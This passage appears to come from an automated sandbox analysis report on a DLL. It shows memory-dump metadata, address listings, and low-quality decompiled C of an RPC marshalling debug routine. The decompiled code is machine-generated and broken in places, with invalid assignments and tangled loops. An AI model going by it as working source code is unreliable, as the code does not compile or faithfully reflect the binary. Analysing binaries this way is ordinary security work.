                                                                                                0x6eda9162
                                                                                                0x6eda9166
                                                                                                0x6eda9171
                                                                                                0x6eda9174
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda8feb
                                                                                                0x6eda8feb
                                                                                                0x6eda8ff1
                                                                                                0x6eda8ff5
                                                                                                0x6eda8ff8
                                                                                                0x6eda8ff9
                                                                                                0x6eda8ffc
                                                                                                0x6eda8ffe
                                                                                                0x6eda8fff
                                                                                                0x6eda9004
                                                                                                0x6eda9009
                                                                                                0x6eda900c
                                                                                                0x6eda9015
                                                                                                0x6eda9017
                                                                                                0x6eda901c
                                                                                                0x6eda901c
                                                                                                0x6eda9022
                                                                                                0x6eda9024
                                                                                                0x6eda902c
                                                                                                0x6eda9034
                                                                                                0x6eda9037
                                                                                                0x6eda903a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda917c
                                                                                                0x6eda917c
                                                                                                0x6eda9183
                                                                                                0x6eda9186
                                                                                                0x6eda9187
                                                                                                0x6eda918a
                                                                                                0x6eda918c
                                                                                                0x6eda918d
                                                                                                0x6eda9192
                                                                                                0x6eda9197
                                                                                                0x6eda919a
                                                                                                0x6eda919d
                                                                                                0x6eda91a0
                                                                                                0x6eda91a1
                                                                                                0x6eda91a6
                                                                                                0x6eda91ab
                                                                                                0x6eda91ae
                                                                                                0x6eda91b1
                                                                                                0x6eda91b7
                                                                                                0x6eda91b9
                                                                                                0x6eda91bc
                                                                                                0x6eda91bc
                                                                                                0x6eda91bf
                                                                                                0x6eda91c2
                                                                                                0x6eda91c8
                                                                                                0x6eda91cc
                                                                                                0x6eda91cf
                                                                                                0x6eda91d3
                                                                                                0x6eda91d8
                                                                                                0x6eda91db
                                                                                                0x6eda91de
                                                                                                0x6eda91e1
                                                                                                0x6eda91e4
                                                                                                0x6eda91eb
                                                                                                0x6eda920c
                                                                                                0x6eda920f
                                                                                                0x6eda9215
                                                                                                0x6eda9219
                                                                                                0x6eda921d
                                                                                                0x6eda9222
                                                                                                0x6eda91ed
                                                                                                0x6eda91ed
                                                                                                0x6eda91f0
                                                                                                0x6eda91f3
                                                                                                0x6eda91f6
                                                                                                0x6eda91f9
                                                                                                0x6eda91fc
                                                                                                0x6eda9203
                                                                                                0x6eda9203
                                                                                                0x6eda9225
                                                                                                0x6eda9229
                                                                                                0x6eda922c
                                                                                                0x6eda922f
                                                                                                0x6eda9233
                                                                                                0x6eda9237
                                                                                                0x6eda9243
                                                                                                0x6eda92d8
                                                                                                0x6eda92d8
                                                                                                0x6eda92db
                                                                                                0x6eda92de
                                                                                                0x6eda92df
                                                                                                0x6eda92e4
                                                                                                0x6eda92e9
                                                                                                0x6eda92ec
                                                                                                0x6eda92ef
                                                                                                0x6eda92f5
                                                                                                0x6eda9302
                                                                                                0x6eda9305
                                                                                                0x6eda9308
                                                                                                0x6eda92f7
                                                                                                0x6eda92fa
                                                                                                0x6eda92fd
                                                                                                0x6eda92fd
                                                                                                0x6eda930e
                                                                                                0x6eda9311
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda924c
                                                                                                0x6eda924f
                                                                                                0x6eda9250
                                                                                                0x6eda9253
                                                                                                0x6eda9255
                                                                                                0x6eda925b
                                                                                                0x6eda925e
                                                                                                0x6eda925f
                                                                                                0x6eda9264
                                                                                                0x6eda9269
                                                                                                0x6eda926c
                                                                                                0x6eda926f
                                                                                                0x6eda9271
                                                                                                0x6eda9274
                                                                                                0x6eda9277
                                                                                                0x6eda927a
                                                                                                0x6eda9280
                                                                                                0x6eda9282
                                                                                                0x6eda9285
                                                                                                0x6eda9287
                                                                                                0x6eda928a
                                                                                                0x6eda928d
                                                                                                0x6eda9290
                                                                                                0x6eda9296
                                                                                                0x6eda9298
                                                                                                0x6eda9299
                                                                                                0x6eda929e
                                                                                                0x6eda92a3
                                                                                                0x6eda92a3
                                                                                                0x6eda92a6
                                                                                                0x6eda92a6
                                                                                                0x6eda92aa
                                                                                                0x6eda92ad
                                                                                                0x6eda92b0
                                                                                                0x6eda92b3
                                                                                                0x6eda92b6
                                                                                                0x6eda92b9
                                                                                                0x6eda92bc
                                                                                                0x6eda92bf
                                                                                                0x6eda92c2
                                                                                                0x6eda92c8
                                                                                                0x6eda92cc
                                                                                                0x6eda92d0
                                                                                                0x6eda92d5
                                                                                                0x00000000
                                                                                                0x6eda92c8
                                                                                                0x00000000
                                                                                                0x6eda9319
                                                                                                0x6eda931b
                                                                                                0x6eda931f
                                                                                                0x6eda9323
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9330
                                                                                                0x6eda9332
                                                                                                0x6eda933a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9347
                                                                                                0x6eda9349
                                                                                                0x6eda934d
                                                                                                0x6eda9351
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9373
                                                                                                0x6eda9378
                                                                                                0x6eda937b
                                                                                                0x6eda9382
                                                                                                0x6eda9385
                                                                                                0x6eda938b
                                                                                                0x6eda938e
                                                                                                0x6eda9391
                                                                                                0x6eda9397
                                                                                                0x6eda939a
                                                                                                0x6eda939d
                                                                                                0x6eda93a1
                                                                                                0x6eda93ad
                                                                                                0x6eda93b0
                                                                                                0x6eda93b3
                                                                                                0x6eda93b4
                                                                                                0x6eda93b7
                                                                                                0x6eda93b8
                                                                                                0x6eda93bd
                                                                                                0x6eda93c2
                                                                                                0x6eda93c5
                                                                                                0x6eda93c8
                                                                                                0x6eda93cb
                                                                                                0x6eda93ce
                                                                                                0x6eda93d5
                                                                                                0x6eda93dc
                                                                                                0x6eda940d
                                                                                                0x6eda9410
                                                                                                0x6eda9413
                                                                                                0x6eda9414
                                                                                                0x6eda9419
                                                                                                0x6eda941e
                                                                                                0x6eda93de
                                                                                                0x6eda93de
                                                                                                0x6eda93e1
                                                                                                0x6eda93e7
                                                                                                0x6eda93fc
                                                                                                0x6eda93ff
                                                                                                0x6eda9400
                                                                                                0x6eda9403
                                                                                                0x6eda9404
                                                                                                0x6eda9407
                                                                                                0x6eda9408
                                                                                                0x6eda93e9
                                                                                                0x6eda93e9
                                                                                                0x6eda93ec
                                                                                                0x6eda93ed
                                                                                                0x6eda93f0
                                                                                                0x6eda93f2
                                                                                                0x6eda93f3
                                                                                                0x6eda93f6
                                                                                                0x6eda93f7
                                                                                                0x6eda93f7
                                                                                                0x6eda940b
                                                                                                0x6eda9421
                                                                                                0x6eda9424
                                                                                                0x6eda9427
                                                                                                0x6eda942d
                                                                                                0x6eda9430
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9438
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9079
                                                                                                0x6eda9079
                                                                                                0x6eda907c
                                                                                                0x6eda907e
                                                                                                0x6eda9081
                                                                                                0x6eda9084
                                                                                                0x6eda9085
                                                                                                0x6eda9088
                                                                                                0x6eda908a
                                                                                                0x6eda908b
                                                                                                0x6eda9090
                                                                                                0x6eda9095
                                                                                                0x6eda909a
                                                                                                0x6eda909e
                                                                                                0x6eda90aa
                                                                                                0x6eda90ad
                                                                                                0x6eda90b0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8f74
                                                                                                0x6eda9462
                                                                                                0x6eda9462
                                                                                                0x6eda944e

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA901C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p
                                                                                                • API String ID: 3997070919-1788898343
                                                                                                • Opcode ID: 23915ac8d14f401e7395780f2df491c297a81970f661584118bde5d08766494d
                                                                                                • Instruction ID: ab09e189f60a6679f989a275a92972373ae9931dce20779abfb7fe9420abfcb1
                                                                                                • Opcode Fuzzy Hash: 23915ac8d14f401e7395780f2df491c297a81970f661584118bde5d08766494d
                                                                                                • Instruction Fuzzy Hash: 42D14BB9A00109AFCB04CF98D890EAA7B76FF89354F14C518FA194F345E731EA51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA9438, Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 318COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA9438() {
				void* _t200;
				void* _t202;

				L0:
				while(1) {
					L0:
					while(1) {
						L44:
						 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
						L1:
						while(( *( *(_t200 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t200 - 0xc) =  *( *(_t200 + 0x10)) & 0x000000ff;
							 *(_t200 - 0xc) =  *(_t200 - 0xc) - 1;
							if( *(_t200 - 0xc) > 0xb8) {
								L43:
								0x6eda0000("unhandled format 0x%02x\n",  *( *(_t200 + 0x10)) & 0x000000ff);
								_t202 = _t202 + 8;
								while(1) {
									L44:
									 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t8 =  *(_t200 - 0xc) + 0x6eda94a4; // 0xcccccc0e
							switch( *((intOrPtr*)(( *_t8 & 0x000000ff) * 4 +  &M6EDA9464))) {
								case 0:
									L4:
									_push( *(_t200 + 0xc));
									_push( *( *(_t200 + 0xc)) & 0x0000ffff);
									_push("byte=%d <= %p\n");
									0x6eda0000();
									E6EDAB030( *((intOrPtr*)(_t200 + 8)),  *(_t200 + 0xc), 1);
									_t202 = _t202 + 0x18;
									 *(_t200 + 0xc) =  &(( *(_t200 + 0xc))[0]);
									L44:
									 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L11:
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [edx]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f <= %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L12:
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ecx + 4);
									_push( *(__ecx + 4));
									__eax =  *__ecx;
									_push(__eax);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp + 8);
									E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8) =  *(__ebp + 0xc);
									__eax =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L13:
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [edx]");
									asm("movsd [esp], xmm0");
									_push("double=%f <= %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8);
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx =  *(__ebp + 0xc);
									 *(__ebp - 4) =  *( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L14:
									 *(__ebp - 0x18) = 0;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("pointer=%p <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									_push( *(__eax + 4));
									_push("pStubMsg->Buffer before %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__edx =  *(__ebp + 0x10);
									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__ecx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__edx =  *(__ebp + 0x14);
									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										__ecx =  *(__ebp + 8);
										__ecx =  *(__ebp + 8) + 4;
										__eax = E6EDA7400( *(__ebp + 8) + 4,  *(__ebp + 8) + 4, 4);
									}
									__edx =  *(__ebp + 8);
									__eax =  *(__edx + 4);
									 *(__ebp - 0x1c) =  *(__edx + 4);
									__ecx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__eax =  *(__ebp + 0x14);
										__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__edx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__edx =  *(__ebp + 8);
										__eax =  *(__ebp + 8);
										__ecx =  *(__eax + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__eax + 0x34);
										__edx =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x18) = 1;
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									__eax =  *(__ebp - 0x1c);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB220( *(__ebp + 8),  *(__ebp - 0x1c),  *( *(__ebp + 0xc)),  *(__ebp + 0x14));
									if( *(__ebp - 0x18) == 0) {
										L28:
										__edx =  *(__ebp + 8);
										__eax =  *(__edx + 4);
										_push( *(__edx + 4));
										_push("pStubMsg->Buffer after %p\n");
										0x6eda0000();
										__esp = __esp + 8;
										__ecx =  *(__ebp + 0x10);
										__edx =  *__ecx & 0x000000ff;
										if(( *__ecx & 0x000000ff) != 0x36) {
											__ecx =  *(__ebp + 0x10);
											__ecx =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) = __ecx;
										} else {
											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L44:
											 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L23:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												 *(__edx + 4) =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x1c);
										 *( *(__ebp + 8) + 4) =  *(__ebp - 0x1c);
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L28;
									}
								case 8:
									L32:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7450(__ecx, __ecx,  *(__ebp - 0x10), 2);
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L33:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6EDA7450(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 4);
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L34:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7450(__ecx, __ebp + 0xc, __ecx, 8);
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									L35:
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									__edx =  *(__ebp + 0xc);
									__eax = __edx + __ecx - 0x3c;
									 *(__ebp + 0xc) = __edx + __ecx - 0x3c;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 0xc:
									L36:
									1 = 1 << 0;
									__edx =  *(__ebp + 0x10);
									 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__edx =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp + 8);
									 *(__ebp - 0x20) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp - 0x20);
									_push( *(__ebp - 0x20));
									_push("embedded complex (size=%d) <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp - 8);
									__eax =  *( *(__ebp - 8)) & 0x000000ff;
									__eax =  *( *(__ebp - 8)) & 0x7f;
									__ecx =  *(0x6edbb218 + __eax * 4);
									 *(__ebp - 0x14) =  *(0x6edbb218 + __eax * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no marshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											__ecx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__edx =  *(__ebp + 0xc);
											__eax =  *( *(__ebp + 0xc));
											_push( *( *(__ebp + 0xc)));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x20);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									goto L0;
								case 0xe:
									L10:
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									 *(__ebp - 0x24) =  *( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("int3264=%ld <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx = __ebp - 0x24;
									__edx =  *(__ebp + 8);
									E6EDAB030( *(__ebp + 8), __ebp - 0x24, 4) =  *(__ebp + 0xc);
									__eax =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L44:
										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									goto L43;
							}
						}
						return  *(_t200 + 0xc);
					}
				}
			}





                                                                                                0x6eda9438
                                                                                                0x6eda9438
                                                                                                0x6eda9438
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda8f3c
                                                                                                0x6eda8f51
                                                                                                0x6eda8f5a
                                                                                                0x6eda8f64
                                                                                                0x6eda943a
                                                                                                0x6eda9446
                                                                                                0x6eda944b
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda944e
                                                                                                0x6eda8f6a
                                                                                                0x6eda8f6d
                                                                                                0x6eda8f74
                                                                                                0x00000000
                                                                                                0x6eda8f7b
                                                                                                0x6eda8f7e
                                                                                                0x6eda8f85
                                                                                                0x6eda8f86
                                                                                                0x6eda8f8b
                                                                                                0x6eda8f9d
                                                                                                0x6eda8fa2
                                                                                                0x6eda8fab
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8fb3
                                                                                                0x6eda8fb3
                                                                                                0x6eda8fb6
                                                                                                0x6eda8fb7
                                                                                                0x6eda8fba
                                                                                                0x6eda8fbd
                                                                                                0x6eda8fbe
                                                                                                0x6eda8fc3
                                                                                                0x6eda8fc8
                                                                                                0x6eda8fcd
                                                                                                0x6eda8fd5
                                                                                                0x6eda8fdd
                                                                                                0x6eda8fe0
                                                                                                0x6eda8fe3
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9042
                                                                                                0x6eda9042
                                                                                                0x6eda9045
                                                                                                0x6eda9046
                                                                                                0x6eda9049
                                                                                                0x6eda904b
                                                                                                0x6eda904c
                                                                                                0x6eda9051
                                                                                                0x6eda9056
                                                                                                0x6eda905b
                                                                                                0x6eda9063
                                                                                                0x6eda906b
                                                                                                0x6eda906e
                                                                                                0x6eda9071
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90b8
                                                                                                0x6eda90b8
                                                                                                0x6eda90bb
                                                                                                0x6eda90bc
                                                                                                0x6eda90bf
                                                                                                0x6eda90c3
                                                                                                0x6eda90c6
                                                                                                0x6eda90cb
                                                                                                0x6eda90d0
                                                                                                0x6eda90d5
                                                                                                0x6eda90da
                                                                                                0x6eda90de
                                                                                                0x6eda90e2
                                                                                                0x6eda90ed
                                                                                                0x6eda90f0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90f8
                                                                                                0x6eda90f8
                                                                                                0x6eda90fb
                                                                                                0x6eda90fc
                                                                                                0x6eda90ff
                                                                                                0x6eda9102
                                                                                                0x6eda9103
                                                                                                0x6eda9105
                                                                                                0x6eda9106
                                                                                                0x6eda910b
                                                                                                0x6eda910e
                                                                                                0x6eda910f
                                                                                                0x6eda9114
                                                                                                0x6eda9119
                                                                                                0x6eda911e
                                                                                                0x6eda9122
                                                                                                0x6eda912e
                                                                                                0x6eda9131
                                                                                                0x6eda9134
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda913c
                                                                                                0x6eda913c
                                                                                                0x6eda913f
                                                                                                0x6eda9140
                                                                                                0x6eda9143
                                                                                                0x6eda9146
                                                                                                0x6eda914a
                                                                                                0x6eda914f
                                                                                                0x6eda9154
                                                                                                0x6eda9159
